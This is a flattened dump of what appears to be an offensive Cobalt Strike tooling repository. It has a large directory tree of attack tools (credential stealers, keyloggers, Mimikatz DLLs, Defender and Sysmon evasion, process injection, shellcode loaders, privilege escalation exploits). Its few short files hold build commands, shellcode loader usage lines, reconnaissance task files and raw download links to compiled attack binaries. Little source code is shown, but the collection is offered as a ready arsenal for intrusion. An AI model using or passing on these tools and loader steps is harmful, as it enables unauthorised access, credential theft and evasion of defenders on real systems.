├── Cobatl Strike ├── Erebus │ ├── ver.txt │ ├── post │ │ └── SharpShell.exe │ ├── third │ │ └── rdpthief │ │ │ └── RdpThief_x64.tmp │ └── modules │ │ ├── third.cna │ │ └── gather.cna ├── Advanced siem detections │ ├── logic_explained.md │ └── usecase1_cobaltstrike_beaconing │ │ ├── lab_setup.md │ │ └── usecase1_cobaltstrike_beaconing │ │ └── detection_query_spl.md ├── Aggrokatz │ ├── requiremets.txt │ └── bof │ │ ├── howto.txt │ │ └── fileread_x64.o ├── CSSG │ ├── build │ │ └── build.txt │ ├── assets │ │ ├── Encryptor │ │ │ ├── obj │ │ │ │ └── Debug │ │ │ │ │ ├── Encryptor.csproj.CoreCompileInputs.cache │ │ │ │ │ ├── Encryptor.exe │ │ │ │ │ ├── Encryptor.pdb │ │ │ │ │ ├── Encryptor.csproj.AssemblyReference.cache │ │ │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ │ │ └── Encryptor.csproj.FileListAbsolute.txt │ │ │ └── bin │ │ │ │ └── Debug │ │ │ │ ├── Encryptor.exe │ │ │ │ └── Encryptor.pdb │ │ └── Encryptor.exe │ └── CSSG_load.cna ├── Cobalt Strike Dec │ ├── task │ │ ├── task_1.bin │ │ ├── task_3.bin │ │ └── task_2.bin │ ├── CS_Dec.bat │ ├── 安装依赖.bat │ ├── requirements.txt │ ├── out.vir │ └── 笔记图片 │ │ ├── image-20251120182036394.png │ │ ├── image-20251120183734599.png │ │ ├── image-20251120184525198.png │ │ ├── image-20251120185036090.png │ │ ├── image-20251120185247702.png │ │ ├── image-20251120185331891.png │ │ ├── image-20251120185407471.png │ │ ├── image-20251120185526954.png │ │ ├── image-20251120190024068.png │ │ ├── image-20251120190544328.png │ │ └── image-20251120192844335.png ├── Custom C2 Channel Template │ └── examples │ │ └── tcp │ │ └── response.txt ├── RDP Thief │ ├── RdpThief │ │ ├── stdafx.cpp │ │ ├── packages.config │ │ ├── targetver.h │ │ └── stdafx.h │ └── RdpThief_x64.tmp ├── BeLix │ ├── config │ │ └── DATA │ ├── internal │ │ └── tasks.go │ ├── metadata │ │ └── struct.go │ ├── cmd │ │ └── main │ │ │ └── main.go │ ├── encrypt │ │ ├── struct.go │ │ └── utils.go │ ├── requester │ │ └── struct.go │ └── go.mod ├── Cobalt Strike MoveKit │ ├── Assemblies │ │ └── EventSub.cs │ └── Aggressor │ │ └── payloadGen.cna ├── killswitch GUI │ ├── Malleable-C2-Profiles │ │ └── googlesearch.profile │ ├── host │ │ └── dnscheckin.cna │ └── cs-install.sh ├── Kerberoast │ ├── requirements.txt │ └── SOURCE │ │ └── Makefile ├── Hidden Desktop │ ├── server │ │ ├── server.h │ │ ├── controlwindow.h │ │ ├── common.h │ │ └── main.c │ ├── client │ │ ├── scmain.h │ │ ├── bfmain.h │ │ ├── LinkOrder.ld │ │ ├── pipe.h │ │ ├── bof │ │ │ ├── start.asm │ │ │ └── main.c │ │ ├── asm │ │ │ ├── x64 │ │ │ │ └── start.asm │ │ │ └── x86 │ │ │ │ └── start.asm │ │ ├── util.h │ │ ├── types.h │ │ ├── args.h │ │ └── common.h │ ├── shared │ │ └── config.h │ └── scripts │ │ └── hashstring.py ├── harleyQu1nn │ └── All_In_One.cna ├── Google CSAgent │ └── target │ │ ├── maven-status │ │ └── maven-compiler-plugin │ │ │ ├── testCompile │ │ │ └── default-testCompile │ │ │ │ └── inputFiles.lst │ │ │ └── compile │ │ │ └── default-compile │ │ │ ├── createdFiles.lst │ │ │ └── inputFiles.lst │ │ ├── GoogleCSAgent.jar │ │ ├── maven-archiver │ │ └── pom.properties │ │ ├── original-GoogleCSAgent.jar │ │ └── classes │ │ └── gca │ │ ├── GoogleCSAgent.class │ │ ├── GoogleAuthenticationTool.class │ │ └── GoogleCSAgent$DefineTransformer.class ├── Aggressor Script 2 │ └── All_In_One.cna ├── C2 Crash │ ├── cc2 │ ├── cc2_64.exe │ └── dict │ │ ├── username.txt │ │ └── process.txt ├── EnumRWX │ ├── bofcompile.bat │ └── enumrwx.o ├── EnumLib │ ├── enumlib.o │ └── bofcompile.bat ├── EnumWSC │ ├── enumwsc.o │ └── bofcompile.bat ├── HideFile │ ├── hidefile.o │ └── bofcompile.bat ├── IdleTime │ ├── idletime.o │ ├── bofcompile.bat │ ├── idletime.h │ └── idletime.cna ├── LoadLib │ ├── loadlib.o │ └── bofcompile.bat ├── PSremote │ ├── psremote.o │ └── bofcompile.bat ├── BOF CredUI │ ├── prompt.png │ ├── command.png │ ├── credui.x64.o │ ├── credui.x86.o │ └── credui.cna ├── EnumFiles │ ├── enumfiles.o │ └── bofcompile.bat ├── ForceLockScreen │ ├── forcelockscreen.h │ ├── forcelockscreen.o │ ├── bofcompile.bat │ ├── forcelockscreen.c │ └── forcelockscreen.cna ├── BOF DLL Inject │ ├── inject.o │ ├── test32.dll │ ├── test64.dll │ ├── cobalt-strike-mandll.png │ └── inject.cna ├── Cobalt Strike Memory Evasion │ └── SleepObfLoader │ │ └── SleepObfLoader │ │ ├── Shellcode.h │ │ ├── minhook │ │ ├── minhook.x64.lib │ │ └── minhook.x86.lib │ │ └── SleepObfLoader.vcxproj.user ├── CredPrompt │ ├── credprompt.o │ └── bofcompile.bat ├── EnumDotnet │ ├── enumdotnet.o │ ├── bofcompile.bat │ └── enumdotnet.cna ├── EnumDrives │ ├── enumdrives.o │ ├── bofcompile.bat │ └── enumdrives.cna ├── EnumShares │ ├── enumshares.o │ └── bofcompile.bat ├── EnumSysmon │ ├── enumsysmon.o │ └── bofcompile.bat ├── SystemInfo │ ├── systeminfo.o │ ├── bofcompile.bat │ └── systeminfo.cna ├── Webcam BOF │ ├── entry.x64.obj │ ├── WebcamBOF.x64.obj │ ├── WebcamBOF.x86.obj │ ├── WebcamBOF │ │ ├── WebcamBOF.zip │ │ ├── WebcamBOF.x64.obj │ │ └── WebcamBOF.x86.obj │ ├── targetver.h │ └── common │ │ └── anticrash.c ├── bluescreenofjeff │ ├── beaconestablishednote.cna │ ├── beaconid_note.cna │ ├── ps-window-alias.cna │ ├── checkin_jobs_context.cna │ ├── timestamped_activitylog_export.cna │ ├── sleep-down-when-no-operators.cna │ └── slack-notify-beacon.cna ├── Aggressor Script 1 │ ├── beaconestablishednote.cna │ ├── say.cna │ ├── loader.cna │ ├── mimikatz-every-30m.cna │ ├── beaconid_note.cna │ ├── checkin_jobs_context.cna │ ├── guest-to-admin.cna │ ├── timestamped_activitylog_export.cna │ ├── service-reboot.cna │ ├── kits │ │ └── AnnoyKit │ │ │ └── scripts │ │ │ └── annoySongs │ │ │ └── Play-ImperialMarch.ps1 │ └── slack-notify-beacon.cna ├── Aggressor Script 3 │ ├── beaconestablishednote.cna │ ├── beaconid_note.cna │ ├── ps-window-alias.cna │ ├── checkin_jobs_context.cna │ ├── timestamped_activitylog_export.cna │ ├── sleep-down-when-no-operators.cna │ └── slack-notify-beacon.cna ├── BOF SprayAD │ ├── SprayAD.x64.o │ ├── SprayAD.x86.o │ └── SOURCE │ │ └── Makefile ├── Elusive Mice │ ├── util │ │ └── hash.exe │ ├── bin │ │ ├── elusiveMice.x64.o │ │ └── elusiveMice.x86.o │ └── Makefile ├── EnumHandles │ ├── enumhandles.o │ └── bofcompile.bat ├── Add User BOF │ ├── dist │ │ ├── iXY2823.PNG │ │ ├── AddUser-Bof.x64.o │ │ └── AddUser-Bof.x86.o │ └── Makefile ├── AddExclusion │ ├── addexclusion.o │ └── bofcompile.bat ├── AddLocalCert │ ├── addlocalcert.o │ └── bofcompile.bat ├── BlindEventlog │ ├── blindeventlog.o │ └── bofcompile.bat ├── Dazzle UP │ ├── dazzleUP.cna │ └── dazzleUP │ │ ├── dazzleUP.vcxproj.user │ │ ├── dazzleUP_Reflective_DLL │ │ └── dazzleUP_Reflective_DLL │ │ │ └── dazzleUP_Reflective_DLL.vcxproj.user │ │ └── headers │ │ ├── exploit_checks │ │ ├── CVE_2019_0836.h │ │ ├── CVE_2019_0841.h │ │ └── CVE_2020_0796.h │ │ └── misconf_checks │ │ └── path_dll_hijack.h ├── DelExclusion │ ├── delexclusion.o │ └── bofcompile.bat ├── DelLocalCert │ ├── dellocalcert.o │ └── bofcompile.bat ├── EnumLocalCert │ ├── enumlocalcert.o │ └── bofcompile.bat ├── EnumWebClient │ ├── enumwebclient.o │ └── bofcompile.bat ├── Hell sHall │ ├── test │ │ ├── Resource.rc │ │ ├── helperfunc.h │ │ └── resource.h │ └── Hell'sHall │ │ ├── Resource.rc │ │ ├── helper │ │ ├── meme.jpg │ │ ├── CypherAES.exe │ │ ├── payload_x64.bin │ │ ├── OEFInjection.exe │ │ ├── output │ │ │ └── payload_x64_blob.enc │ │ └── hasher.py │ │ ├── helperfunc.h │ │ └── resource.h ├── PasswordSpray │ ├── passwordspray.o │ └── bofcompile.bat ├── SilenceSysmon │ ├── silencesysmon.o │ └── bofcompile.bat ├── WiFiPasswords │ ├── wifipasswords.o │ ├── bofcompile.bat │ └── wifipasswords.cna ├── CaptureNetNTLM │ ├── capturenetntlm.o │ └── bofcompile.bat ├── EnumExclusions │ ├── enumexclusions.o │ └── bofcompile.bat ├── Spray AD │ ├── Spray-AD │ │ └── Spray-AD.dll │ └── Src │ │ └── Spray-AD │ │ └── Spray-AD │ │ └── Spray-AD.vcxproj.user ├── AddFirewallRule │ ├── addfirewallrule.o │ ├── bofcompile.bat │ └── addfirewallrule.h ├── DelFirewallRule │ ├── delfirewallrule.o │ ├── bofcompile.bat │ └── delfirewallrule.h ├── DllComHijacking │ ├── dllcomhijacking.o │ ├── bofcompile.bat │ └── dllcomhijacking.h ├── DllEnvHijacking │ ├── dllenvhijacking.o │ └── bofcompile.bat ├── EnumSecProducts │ ├── enumsecproducts.o │ └── bofcompile.bat ├── InjectPoolParty │ ├── injectpoolparty.o │ └── bofcompile.bat ├── Portscan BOF │ ├── bin │ │ ├── pingscanner.bof.o │ │ └── portscanner.bof.o │ ├── def_file_gen │ │ └── cmon.py │ └── src │ │ └── trustedsec-bof-print.h ├── AddTaskScheduler │ ├── addtaskscheduler.o │ ├── bofcompile.bat │ └── addtaskschedulerNoSYSTEM.o ├── Beaconator │ ├── images │ │ ├── alaris-console.png │ │ ├── alaris-options.png │ │ ├── option-staged.png │ │ ├── pezor-console.png │ │ ├── pezor-options.png │ │ ├── option-stageless.png │ │ ├── scarecrow-console.png │ │ └── scarecrow-options.png │ └── scripts │ │ └── scarecrow_helper.py ├── DelTaskScheduler │ ├── deltaskscheduler.o │ └── bofcompile.bat ├── EnumTaskScheduler │ ├── enumtaskscheduler.o │ └── bofcompile.bat ├── KeyloggerRawInput │ ├── keyloggerrawinput.o │ ├── bofcompile.bat │ └── keyloggerrawinput-noForeground.o ├── ExecuteCrossSession │ ├── executecrosssession.o │ └── bofcompile.bat ├── No PowerShell trunk │ ├── NoPowerShell.exe.lnk │ ├── NoPowerShell32.dll.lnk │ ├── NoPowerShell64.dll.lnk │ └── DOTNET45 │ │ ├── NoPowerShell.exe.lnk │ │ ├── NoPowerShell32.dll.lnk │ │ ├── NoPowerShell64.dll.lnk │ │ └── readme.txt ├── Cobalt Strike DingtalkBot │ ├── requirements.txt │ └── CS-Dingtalk-Bot.cna ├── BOFs │ └── MiniDumpWriteDump │ │ ├── minidumpwritedump.x64.o │ │ └── Makefile ├── Cobalt Strike Aggressor Kit │ ├── Pictures │ │ ├── logo.png │ │ ├── Diagram-1.png │ │ ├── Diagram-2.png │ │ ├── Diagram-3.png │ │ ├── Diagram-4.png │ │ ├── signal-token.png │ │ ├── New-message-CS.png │ │ ├── locate-example.png │ │ ├── signal-token-2.png │ │ ├── File-Color-Example.png │ │ ├── Sonata-Example-1.png │ │ ├── Sonata-Example-2.png │ │ ├── Web-Hit-Example1.png │ │ ├── CS-Client-Disconnect.png │ │ ├── Discord-Linux-Parser.png │ │ ├── Host-File-Clone-Site.png │ │ ├── Keystrokes-Received.png │ │ ├── New-Beacon-Example1.png │ │ ├── New-Screesnhot-taken.png │ │ ├── linux-parser-example.png │ │ ├── Beacon-Tab-Name-Example.png │ │ ├── CWD-Beacon-Bar-Example.png │ │ ├── Process-Color-Example.png │ │ ├── windows-parser-example.png │ │ ├── CS-All-Tabs-Bold-Example.png │ │ ├── CWD-Beacon-Bar-Example-2.png │ │ ├── CWD-Beacon-Bar-Example-Admin.png │ │ ├── Auto-Sleep-Interactive-Example.png │ │ ├── Beacon-Tab-Name-Colors-Example.png │ │ ├── New-CS-Client-Connect-Example1.png │ │ └── Teams-CNA-Linux-Parser-Example.png │ └── Auto │ │ ├── auto-sleep-interactive-for-testing.cna │ │ └── auto-sleep-after-initial-access.cna ├── Sweet Potato CS │ ├── README.md │ ├── app.config │ └── Com │ │ └── IEnumSTATSTG.cs ├── rasta-mouse │ ├── elevate │ │ └── modules │ │ │ ├── cve-2015-1701.x64.dll │ │ │ ├── cve-2015-1701.x86.dll │ │ │ └── cve-2016-0051.x86.dll │ └── loader.cna ├── Adrenaline │ ├── recon │ │ ├── app_count │ │ │ ├── applications_enum.x64.o │ │ │ ├── applications_enum.x86.o │ │ │ └── Makefile │ │ └── netjoin_query │ │ │ └── netjoin_query.x64.o │ ├── env_assessment │ │ ├── wef_detect │ │ │ └── wef_detect.x64.o │ │ ├── aad_ca_policy │ │ │ └── aad_ca_policy.x64.o │ │ ├── applocker_policy │ │ │ └── applocker_policy.x64.o │ │ └── bitlocker_status │ │ │ └── bitlocker_status.x64.o │ ├── defense_detection │ │ ├── asr_status │ │ │ └── asr_status.x64.o │ │ ├── wsc_status │ │ │ ├── wsc_status.x64.o │ │ │ └── wsc_status.x86.o │ │ └── amsi_etw_detect │ │ │ ├── amsi_etw_detect.x64.o │ │ │ └── amsi_etw_detect.x86.o │ ├── cred_access │ │ ├── clipboard_grab │ │ │ ├── clipboard_grab.x64.o │ │ │ └── Makefile │ │ └── window_handles_enum │ │ │ ├── window_handles_enum.x64.o │ │ │ └── Makefile │ └── target_prioritization │ │ └── user_idle │ │ ├── user_idle.x64.o │ │ └── user_idle.x86.o ├── Aggressor CNA │ └── JuickyPotato_DLL │ │ └── JuicyPotato │ │ ├── dump.stg │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── stdafx.h │ │ └── LocalNegotiator.h ├── Cobalt Strike MS17-010 │ └── aggressor.cna ├── Screenshot BOF │ ├── ScreenshotBOF │ │ ├── ScreenshotBOF.x64.obj │ │ └── ScreenshotBOF.x86.obj │ └── common │ │ └── anticrash.c ├── Mory │ └── utils │ │ ├── mimes.js │ │ └── data2blob.js ├── Cobalt Strike CNA │ └── Persistence │ │ └── Modules │ │ ├── Exitservice │ │ └── uinit.exe │ │ ├── AdUserApi │ │ └── HaryyUser.exe │ │ └── FileControler │ │ └── FileControler_x64.dll ├── Venoma │ └── Kobra │ │ ├── Kobra.vcxproj.user │ │ ├── syscalls.asm │ │ └── Ven.h ├── Bypass UAC │ └── Aggressor-Scripts-master │ │ └── UACBypass │ │ └── ExampleAudit.png ├── OperatorsKit │ └── compile-all.bat ├── Cobalt Strike Inject Kit │ └── KIT │ │ └── TartarusGate │ │ ├── bin │ │ ├── process_inject_spawn.x64.o │ │ └── process_inject_explicit.x64.o │ │ └── Makefile ├── Enable WebDAV Client BOF │ └── Makefile ├── Cobalt Strike Process Inject Kit │ ├── process-inject-explicit │ │ ├── packages.config │ │ └── base │ │ │ └── helpers.h │ └── process-inject-spawn │ │ └── base │ │ └── helpers.h ├── Beacon Notifier Discord │ ├── request.py │ └── notify.cna ├── Beacon Killer │ ├── Properties │ │ └── Settings.settings │ ├── DetailForm.cs │ └── Program.cs ├── Log Striker │ └── requirements.txt ├── Nim Beacon │ └── cmd │ │ └── dns.nim ├── Psk │ ├── psk_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── Psk.cna ├── Psc │ ├── psc_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── Psc.cna ├── Psw │ ├── psw_bof.s1.py │ ├── Psw.cna │ └── SOURCE │ │ └── Makefile ├── Smbinfo │ └── SOURCE │ │ ├── Smbinfo.h │ │ └── Makefile ├── Domaininfo │ ├── Domaininfo_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── Domaininfo.cna ├── FortyNorthSecurity │ └── Initial Access │ │ └── Notifications │ │ └── text_aggressor.cna ├── StartWebClient │ ├── StartWebClient_bof.s1.py │ ├── SOURCE │ │ ├── StartWebClient.h │ │ └── Makefile │ └── StartWebClient.cna ├── Cobalt Strike Artifact Kit │ └── Cargo.toml ├── p292 │ └── disableeventvwr.cna ├── BOF Oxide │ └── src │ │ └── rust_bof.rs ├── Winver │ ├── Winver_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── Winver.cna ├── offsecginger │ └── custom_payload_generator │ │ └── templates │ │ └── jsp_template.jsp ├── BOF RunPe │ └── Makefile ├── WdToggle │ ├── WdToggle_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── WdToggle.cna ├── Sharp Zero Logon │ └── SharpZeroLogon.csproj.user ├── Psm │ └── SOURCE │ │ └── Makefile ├── Psx │ └── SOURCE │ │ └── Makefile ├── morph HTA │ └── banner.txt ├── Askcreds │ └── SOURCE │ │ └── Makefile ├── KerbHash │ └── SOURCE │ │ └── Makefile ├── Klist │ └── SOURCE │ │ └── Makefile ├── Lapsdump │ └── SOURCE │ │ └── Makefile ├── ReconAD │ └── SOURCE │ │ └── Makefile ├── SprayAD │ └── SOURCE │ │ └── Makefile ├── FindObjects │ └── SOURCE │ │ └── Makefile ├── PetitPotam │ └── SOURCE │ │ └── Makefile ├── AddMachineAccount │ └── SOURCE │ │ └── Makefile └── CVE-2022-26923 │ └── SOURCE │ └── Makefile ├── ArtifactKit ├── src │ └── Readme.md ├── src-common │ └── Readme.md ├── RawOutput │ └── Readme.md ├── output │ └── Readme.md ├── beacon_dll │ └── beacon_dll.vcxproj.user ├── beacon_exe │ └── beacon_exe.vcxproj.user ├── beacon_common │ └── beacon_common.vcxproj.user └── beacon_service │ └── beacon_service.vcxproj.user ├── Cobalt Strike Win Exec ├── cmake │ ├── build │ │ ├── build.sh │ │ ├── secret.h │ │ ├── tick.s │ │ └── secret.c │ └── dblt │ │ ├── wbe.deb │ │ └── strike.asm ├── doc │ ├── build │ │ ├── build.sh │ │ ├── secret.h │ │ ├── tick.s │ │ └── secret.c │ └── dblt │ │ ├── wbe.deb │ │ └── strike.asm ├── CMakeLists.txt └── tools │ └── test.sh ├── Loader ├── Doge Loader │ └── local │ │ ├── txt │ │ ├── xor │ │ │ ├── readme.md │ │ │ └── stager.txt │ │ └── readme.md │ │ └── bin │ │ └── readme.md ├── COFF Loader │ ├── BOF │ │ ├── Makefile │ │ └── test64.out │ └── Include │ │ └── utils.h ├── CSx3Ldr │ └── icon.o ├── BOF Loader │ ├── arp.x64.o │ ├── whoami.x64.o │ ├── whoami.x64.o.i64 │ └── Cargo.toml ├── AceLdr │ ├── src │ │ ├── hooks │ │ │ ├── heap.c │ │ │ └── hooks.h │ │ ├── retaddr.h │ │ ├── link.ld │ │ ├── asm │ │ │ ├── start.asm │ │ │ └── misc.asm │ │ ├── util.h │ │ └── retaddr.c │ ├── bin │ │ └── AceLdr.cna │ └── scripts │ │ └── hashstring.py ├── Cobalt Strike Crystal Kit │ ├── libtcg.x64.zip │ ├── libtp.x64.zip │ ├── Makefile │ ├── udrl │ │ └── Makefile │ └── postex-udrl │ │ └── Makefile ├── Titan Ldr │ ├── SectionLink.ld │ ├── Labels.h │ ├── Peb.h │ ├── Pe.h │ ├── Hash.h │ ├── hooks │ │ └── DnsQuery_A.h │ ├── Titan.cna │ ├── python3 │ │ └── hashstring.py │ ├── Common.h │ └── asm │ │ ├── x86 │ │ ├── Start.asm │ │ └── GetIp.asm │ │ └── x64 │ │ ├── Start.asm │ │ └── GetIp.asm ├── HellLoader │ └── HellsGate │ │ └── HellsGate │ │ └── HellsGate │ │ ├── HellsGate.vcxproj.user │ │ ├── connector.h │ │ └── hellsgate.asm └── kits │ └── AnnoyKit │ └── scripts │ └── annoySongs │ └── Play-ImperialMarch.ps1 ├── Community KIT └── css │ └── imgs │ └── favicon.ico ├── Mimikatz Kit ├── resources │ ├── mimikatz-min.x64.dll │ ├── mimikatz-min.x86.dll │ ├── mimikatz-full.x64.dll │ ├── mimikatz-full.x86.dll │ ├── mimikatz-chrome.x64.dll │ └── mimikatz-chrome.x86.dll └── mimikatz.cna ├── Cobalt Strike Toolset ├── AggressorScript │ └── nopowershell │ │ └── scripts │ │ └── NoPowerShell.exe └── Kits │ └── ResourceKit │ ├── compress.ps1 │ └── htmlapp2.txt ├── Profile └── Malleable Profiles │ ├── sleepmask-vs │ └── BOF-Template │ │ ├── packages.config │ │ └── base │ │ └── helpers.h │ └── rich_header.py ├── threatexpress └── beacon_webview │ ├── beacons.csv │ └── notes.md ├── Und3rf10w ├── Pushover │ └── pushover-cs └── auto-keylogger.cna ├── VYSEC ├── CACTUSTORCH │ └── banner.txt └── auto-keylog-consent.cna └── Cobalt Strike Zig Artifact Kit └── build.zig /Cobatl Strike/Erebus/ver.txt: -------------------------------------------------------------------------------- 1 | 1.2.3 2 | -------------------------------------------------------------------------------- /Cobatl Strike/Advanced siem detections/logic_explained.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggrokatz/requiremets.txt: -------------------------------------------------------------------------------- 1 | 'pypykatz>=0.4.8' 2 | -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/build/build.txt: -------------------------------------------------------------------------------- 1 | shellcode build files go here -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/task/task_1.bin: -------------------------------------------------------------------------------- 1 | whoami -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/task/task_3.bin: -------------------------------------------------------------------------------- 1 | tasklist -------------------------------------------------------------------------------- /Cobatl Strike/Custom C2 Channel Template/examples/tcp/response.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/config/DATA: -------------------------------------------------------------------------------- 1 | This folder must contain the config file -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/task/task_2.bin: -------------------------------------------------------------------------------- 1 | ipconfig /all -------------------------------------------------------------------------------- /ArtifactKit/src/Readme.md: -------------------------------------------------------------------------------- 1 | Put the contents of your src-main directory here. -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/build/build.sh: -------------------------------------------------------------------------------- 1 | gcc -o wce wce.c wcexec.s secret.c -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/build/build.sh: -------------------------------------------------------------------------------- 1 | gcc -o wce wce.c wcexec.s secret.c -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike MoveKit/Assemblies/EventSub.cs: -------------------------------------------------------------------------------- 1 | //Work in progress -------------------------------------------------------------------------------- /Cobatl Strike/killswitch GUI/Malleable-C2-Profiles/googlesearch.profile: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /ArtifactKit/src-common/Readme.md: -------------------------------------------------------------------------------- 1 | Put the contents of your src-common directory here. -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/build/secret.h: -------------------------------------------------------------------------------- 1 | 2 | int check_password(char* password); -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/build/secret.h: -------------------------------------------------------------------------------- 1 | 2 | int check_password(char* password); -------------------------------------------------------------------------------- /Cobatl Strike/Kerberoast/requirements.txt: -------------------------------------------------------------------------------- 1 | impacket>=0.9.24 2 | pyasn1>=0.4.8 3 | -------------------------------------------------------------------------------- /Cobatl Strike/Advanced siem detections/usecase1_cobaltstrike_beaconing/lab_setup.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggrokatz/bof/howto.txt: -------------------------------------------------------------------------------- 1 | mingw 2 | 3 | gcc -c fileread.c -o fileread.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/CS_Dec.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | python CS_Dec.py 3 | pause 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/安装依赖.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | pip install -r requirements.txt 3 | pause 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/server/server.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | BOOL StartServer( INT port ); 4 | -------------------------------------------------------------------------------- /Loader/Doge Loader/local/txt/xor/readme.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | 4 | ./xor.exe stager.txt 5 | 会生成异或后的xor.txt -------------------------------------------------------------------------------- /ArtifactKit/RawOutput/Readme.md: -------------------------------------------------------------------------------- 1 | This directory will contain the temporary files from the compile process. -------------------------------------------------------------------------------- /Cobatl Strike/harleyQu1nn/All_In_One.cna: -------------------------------------------------------------------------------- 1 | Remaking this completely. Keep an eye out for a version 2 release :) 2 | -------------------------------------------------------------------------------- /Loader/COFF Loader/BOF/Makefile: -------------------------------------------------------------------------------- 1 | 2 | all: bof 3 | 4 | bof: 5 | x86_64-w64-mingw32-gcc -c test.c -o test64.out -------------------------------------------------------------------------------- /Loader/Doge Loader/local/bin/readme.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | ./main.exe [shellcode_Path] 4 | 5 | ./main.exe sc.bin -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 2/All_In_One.cna: -------------------------------------------------------------------------------- 1 | Remaking this completely. Keep an eye out for a version 2 release :) 2 | -------------------------------------------------------------------------------- /Loader/CSx3Ldr/icon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/CSx3Ldr/icon.o -------------------------------------------------------------------------------- /Loader/Doge Loader/local/txt/readme.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | ./main.exe [shellcodetxt_xor_path] 4 | 5 | ./main.exe xor.txt 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/scmain.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( B ) DWORD WINAPI InputHandler( PARGS* ppArgs ); 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Advanced siem detections/usecase1_cobaltstrike_beaconing/usecase1_cobaltstrike_beaconing/detection_query_spl.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cobatl Strike/C2 Crash/cc2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/C2 Crash/cc2 -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 277526e6458b7c0ee0115c49957c0929904d1374 2 | -------------------------------------------------------------------------------- /Loader/BOF Loader/arp.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/BOF Loader/arp.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumRWX/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumrwx.c 4 | move /y enumrwx.obj enumrwx.o -------------------------------------------------------------------------------- /Loader/BOF Loader/whoami.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/BOF Loader/whoami.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/C2 Crash/cc2_64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/C2 Crash/cc2_64.exe -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/requirements.txt: -------------------------------------------------------------------------------- 1 | pefile 2 | peutils 3 | minidump 4 | pyzipper 5 | colorama 6 | pycryptodome 7 | hexdump 8 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumLib/enumlib.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumLib/enumlib.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumRWX/enumrwx.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumRWX/enumrwx.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumWSC/enumwsc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumWSC/enumwsc.o -------------------------------------------------------------------------------- /Cobatl Strike/HideFile/hidefile.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/HideFile/hidefile.o -------------------------------------------------------------------------------- /Cobatl Strike/IdleTime/idletime.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/IdleTime/idletime.o 